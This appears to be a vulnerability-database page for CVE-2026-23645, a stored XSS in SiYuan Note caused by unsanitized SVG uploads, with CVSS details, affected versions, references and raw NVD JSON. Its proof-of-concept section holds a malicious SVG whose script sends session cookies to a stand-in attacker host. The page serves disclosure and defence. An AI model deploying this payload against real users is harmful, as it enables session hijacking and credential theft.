Security Vulnerability Report
中文
CVE-2026-23645 CVSS 6.1 MEDIUM

CVE-2026-23645

Published: 2026-01-16 20:15:50
Last Modified: 2026-01-30 19:32:12
Source: [email protected]

Description

SiYuan is self-hosted, open source personal knowledge management software. Prior to 3.5.4-dev2, a Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session. This vulnerability is fixed in 3.5.4-dev2.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:b3log:siyuan:3.5.4:dev1:*:*:*:*:*:* - VULNERABLE
SiYuan Note < 3.5.4-dev2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-23645 PoC: Malicious SVG file for SiYuan Note XSS --> <svg xmlns="http://www.w3.org/2000/svg"> <script> <![CDATA[ // Steal session cookies and send to attacker server var cookies = document.cookie; var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://attacker.com/steal?c=' + encodeURIComponent(cookies), true); xhr.send(); // Alternative payload: Display fake login prompt to phish credentials alert('Session hijacking payload executed!'); console.log('Stolen cookies:', cookies); ]]> </script> <rect width="100" height="100" fill="red"/> <text x="10" y="50">Malicious SVG - XSS</text> </svg>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23645", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:49.880", "lastModified": "2026-01-30T19:32:11.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is self-hosted, open source personal knowledge management software. Prior to 3.5.4-dev2, a Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan Note. The application does not sanitize uploaded SVG files. If a user uploads and views a malicious SVG file (e.g., imported from an untrusted source), arbitrary JavaScript code is executed in the context of their authenticated session. This vulnerability is fixed in 3.5.4-dev2."}, {"lang": "es", "value": "SiYuan es un software de gestión de conocimiento personal de código abierto y autoalojado. Antes de la versión 3.5.4-dev2, existe una vulnerabilidad de cross-site scripting (XSS) almacenado en SiYuan Note. La aplicación no sanitiza los archivos SVG subidos. Si un usuario sube y visualiza un archivo SVG malicioso (por ejemplo, importado de una fuente no confiable), se ejecuta código JavaScript arbitrario en el contexto de su sesión autenticada. Esta vulnerabilidad se ha corregido en la versión 3.5.4-dev2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.4", "matchCriteriaId": "D3F308D6-1396-4488-9382-0EE485C9289C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:3.5.4:dev1:*:*:*:*:*:*", "matchCriteriaId": "2CB8C612-80B3-4D14-9454-D444D227FA4B"}]}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/commit/11115da3d0de950593ee4ce375cf7f9018484388", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/siyuan-note/siyuan/issues/16844", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-pcjq-j3mq-jv5j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.